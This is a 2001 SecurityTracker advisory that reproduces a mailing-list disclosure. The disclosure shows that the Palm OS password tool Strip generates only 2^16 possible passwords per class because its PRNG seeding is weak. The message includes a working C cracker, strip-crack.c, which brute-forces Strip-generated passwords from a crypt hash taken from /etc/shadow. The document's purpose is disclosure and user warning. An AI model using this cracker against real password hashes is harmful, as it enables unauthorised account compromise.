Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Security)  >   Strip (Secure Tool For Recalling Important Passwords) Vendors:   Zetetic
Strip Password Tool for Palm OS Generates Weak Passwords (Which May Be Used on Various Non-Palm Applications and Operating Systems)
SecurityTracker Alert ID:  1001292
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 11 2001
Impact:   Disclosure of authentication information

Description:   The Strip (Secure Tool for Recalling Important Passwords) utility for Palm OS is a password notebook that stores the user's various passwords in encrypted form. The password generation tool, which can generate passwords for other systems, reportedly uses weak cryptography such that brute force decryption of the Strip-generated passwords can be performed rapidly.

Apparently, 2^16 passwords can be created per class (e.g., alphanumeric, alphabetic, numeric).).

Strip reportedly uses the PalmOS SysRandom() function, a simplistic linear pseudo-random noise generator, to generate the passwords. Strip then tries to seed this function with the result of TimGetTicks(), a function that returns the number of ticks (1 Tick =3D 10ms on current devices) since the last reset of your Palm. Because the ticks counter is not incremented when the device is turned off, small values for the TimGetTicks() result are much more likely than large values. Finally, the TimeGetTicks() function is intended to return a 32 bit integer value (which will be used to seed the random number generator), but this value is stored in a 16 bit integer variable. As a result, the number of possible values is limited.

Impact:   A local user (on any application or OS -- not just Palm OS) with access to encrypted passwords generated by Strip may be able to easily decrypt those passwords.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Randomization error
Underlying OS:  PalmOS

Message History:   None.

 Source Message Contents

Subject:  Catastrophic failure of Strip password generation.

Content-Type: multipart/mixed; boundary="M9NhX3UHpAaciwkO"
Content-Disposition: inline

Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Executive summary: If you have ever used Strip for the Palm to
generate your passwords, change them.  Change them NOW.

Strip (Secure Tool for Recalling Important Passwords) is a nice
encrypted password notebook for the Palm; see
<> for details.

Strip-0.5 also features a function for generating passwords, which
certainly has some appeal to anyone who generates passwords

However, this function has some flaws, one of which has the effect
to limit the number of different passwords strip can create to 2^16
per class (alphanumeric, alphabetic, numeric, ... with N

Generating this number of passwords and trying each of them with
crypt(3) is a matter of less than 3 seconds on a current PC running

The attached program can be used to demonstrate this in the case of
alphanumeric passwords containing 8 characters.  Just take your
encrypted, strip-generated password from /etc/shadow, and pass it as
the single command line argument.  (Covering the other classes of
passwords strip can generate is left as an exercise.)

The Flaws

- Strip uses the PalmOS SysRandom() function to generate the
  passwords.  SysRandom() is a very simplistic linear PRNG, which
  should most likely not be used for password generation.

- Strip tries to seed this PRNG with the result of TimGetTicks().
  TimGetTicks() returns the number of ticks (1 Tick =3D 10ms on
  current devices) since the last reset of your Palm.  The ticks
  counter is not incremented when the device is turned off.

  Obviously, small values for the TimGetTicks() result are much more
  likely than large values, so an attacker could just start at 0 and
  try any possible ticks value.  This kind of attack would already
  be quite successfull and efficient - at least against any
  passwords generated during the first couple of months of regular
  use of a PalmOS device after a reboot.

- The actual implementation has a bug which finally limits the
  search space to trivial dimensions: TimeGetTicks() returns a 32
  bit integer value, and the PRNG expects such a value as its seed.
  However, the return value from TimeGetTicks() is stored in a 16
  bit Int variable.

  Thus, the numbers 0, ..., 0xffff are the only seeds which will
  ever be used, limiting the number of possible passwords of any
  class to 2^16.


Thanks to Ian Goldberg for posting his (correct) take at the
SysRandom() function to coderpunks, and to Marc Haber for telling me
about Strip.

Thomas Roessler			    <>

Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="strip-crack.c"
Content-Transfer-Encoding: quoted-printable

 * Crack passwords generate by strip ("Secure Tool for Recalling
 * Important Passwords") for the Palm; see
 * <> for details.
 * Copyright (c) 2001 by Thomas Roessler
 * <>.
 * Use, distribute and modify freely.

#include <stdio.h>
#include <stdlib.h>

#include <string.h>
#include <crypt.h>

/* The PalmOS SysRandom() RNG. */

static unsigned int multiplier =3D 22695477;
static unsigned int _seed =3D 0;

short palm_rand (unsigned int new_seed)
  if (new_seed)
    _seed =3D new_seed;
  _seed =3D (_seed * multiplier) + 1;
  return (short)  ((_seed >> 16)  & 0x7fff);

 * Strip's password generation algorithm for the alphanumeric case -=20
 * you can easily change this to cover the other cases as well.

static char *alphas =3D "abcdefhijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY=
static char *numerics =3D "0123456789";

char *possible_password (unsigned int seed, int size)
  static char pwbuff[1024];
  char z[1024];
  int i, r;
  int valids;

  if (size > sizeof (pwbuff))
    exit (1);
  sprintf (z, "%s%s",numerics, alphas);
  valids =3D strlen (z);
  r =3D palm_rand (seed);

  for (i =3D 0; i < size; i++)
    r =3D palm_rand (0);
    pwbuff[i] =3D z[r % valids];
  pwbuff[i] =3D '\0';
  return pwbuff;

/* check all possible passwords */

int main (int argc, char *argv[])
  int i;
  char *pw;
  for (i =3D 0; i <=3D 0xffff; i++)
    pw =3D possible_password ((short) i, 8);
    if (!argv[1] || !strcmp (argv[1], crypt (pw, argv[1])))
      printf ("%s\n", pw);
  return 0;


Content-Type: application/pgp-signature
Content-Disposition: inline

Version: 2.6.3in




Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC